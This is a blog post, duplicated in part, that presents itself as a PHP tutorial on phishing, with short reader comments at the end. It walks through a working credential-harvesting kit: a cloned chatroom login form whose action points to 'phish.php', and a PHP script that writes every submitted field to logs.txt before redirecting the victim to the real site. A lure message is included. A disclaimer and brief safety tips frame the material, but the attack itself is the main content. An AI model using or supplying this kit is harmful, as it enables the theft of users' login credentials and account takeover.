This is here because my my web service provider blocked my IP everytime i tried to publish it on my blog.
Any way here it is part of your PHP tutotial.
Today i'll talk about PHISHING attacks,If you thinking of hacking Facebook accounts after reading this tutorial or thinking i'm going to help you in hacking then close the Tab right now.I'm Just explaining the source code of a Phishing scenario .
Phishing is not hacking at all it is something called Social Engineering.Basically attacker fool the users of website.
Scenario:
Manish is user of some chat room and his friend Tushar is a good programmer and know some cool tricks.
Tushar posted a link while chating with manish.May be something like this:
Visit this cool site http://xyz.ghte.com ,it'll give you free recharge or something this play this game and become lucky winner of one lakh rupee.
Manish get excited want to try what the site is all about. He clicked the given link Nothing happened ,it appears like login page of his chatroom, he think there will be something after login.He logged in and nothing happen,it is the same chatroom.
But day after this incident when manish tried to login his chat room it said "Wrong Password".He tried many time but the result was still same "wrong password".
So what happened ...?
Manish got Hacked by Tushar.How..?? lets see:
Code:
Let us assume this is login page of the chatroom:
there is nothing special about the code it contain a form with two fields name and password ,if a user enter his name and password he'll redirected to the chatroom.
But what tushar did is,he copied the source code of login page and change the action field "login.php" to his own crafted page "phish.php".Now his login page will be something like this :
Note the action field .
He created a page called phish.php where the user will be redirected.Phish.php will look like some this:
and he uploaded both the file to his domain http://xyz.ghte.com.
Explaing the code:
header is used to redirect the page,here what tushar did is redirect the user after login to the chatroom hence user will never know what happened.
Next created a file handling variable $handle which will open a txt file with file name logs,with read and write previlage using "a".After that he created a loop , for every Post request it will create a variable with input name and the value of input field.Next fwrite is used to write the variable with value in logs.txt.It will look like something this:
user=manishpass=manish1234
Hence Tushar can see Manish username and password in logs.txt.Hence Manish got hacked.
Caution :
Never click the a unknown link.
Always check the address bar before login .
If you find any phishing page on any website report to the site administrator.
Surf Safe.
Any way here it is part of your PHP tutotial.
Today i'll talk about PHISHING attacks,If you thinking of hacking Facebook accounts after reading this tutorial or thinking i'm going to help you in hacking then close the Tab right now.I'm Just explaining the source code of a Phishing scenario .
Phishing is not hacking at all it is something called Social Engineering.Basically attacker fool the users of website.
Scenario:
Manish is user of some chat room and his friend Tushar is a good programmer and know some cool tricks.
Tushar posted a link while chating with manish.May be something like this:
Visit this cool site http://xyz.ghte.com ,it'll give you free recharge or something this play this game and become lucky winner of one lakh rupee.
Manish get excited want to try what the site is all about. He clicked the given link Nothing happened ,it appears like login page of his chatroom, he think there will be something after login.He logged in and nothing happen,it is the same chatroom.
But day after this incident when manish tried to login his chat room it said "Wrong Password".He tried many time but the result was still same "wrong password".
So what happened ...?
Manish got Hacked by Tushar.How..?? lets see:
Code:
Let us assume this is login page of the chatroom:
<html>
<body>
<form action="login.php" method="post">
Name:<br />
<input name="user" type="text" /><br />
pass:<br />
<input name="pass" type="password" />
<input name="" type="submit" />
</form>
</body>
</html>there is nothing special about the code it contain a form with two fields name and password ,if a user enter his name and password he'll redirected to the chatroom.
But what tushar did is,he copied the source code of login page and change the action field "login.php" to his own crafted page "phish.php".Now his login page will be something like this :
<html>
<body>
<form action="phish.php" method="post">
Name:<br />
<input name="user" type="text" /><br />
pass:<br />
<input name="pass" type="password" />
<input name="" type="submit" />
</form>
</body>
</html>Note the action field .
He created a page called phish.php where the user will be redirected.Phish.php will look like some this:
<?php
header("location:http://chatroom.com/login.php");
$handle=fopen("logs.txt","a");
foreach($_POST as $var=>$value){
fwrite($handle,$var);
fwrite($handle,"=");
fwrite($handle,$value);
}
fclose ($handle)
?>and he uploaded both the file to his domain http://xyz.ghte.com.
Explaing the code:
header is used to redirect the page,here what tushar did is redirect the user after login to the chatroom hence user will never know what happened.
Next created a file handling variable $handle which will open a txt file with file name logs,with read and write previlage using "a".After that he created a loop , for every Post request it will create a variable with input name and the value of input field.Next fwrite is used to write the variable with value in logs.txt.It will look like something this:
user=manishpass=manish1234
Hence Tushar can see Manish username and password in logs.txt.Hence Manish got hacked.
Caution :
Never click the a unknown link.
Always check the address bar before login .
If you find any phishing page on any website report to the site administrator.
Surf Safe.
nice post dude... Good work with php... Impresive...
ReplyDeleteThanks Buddy :)
Deletehello manish i m stater in this feild can u tell me in detail that what is that php script and how it works
Delete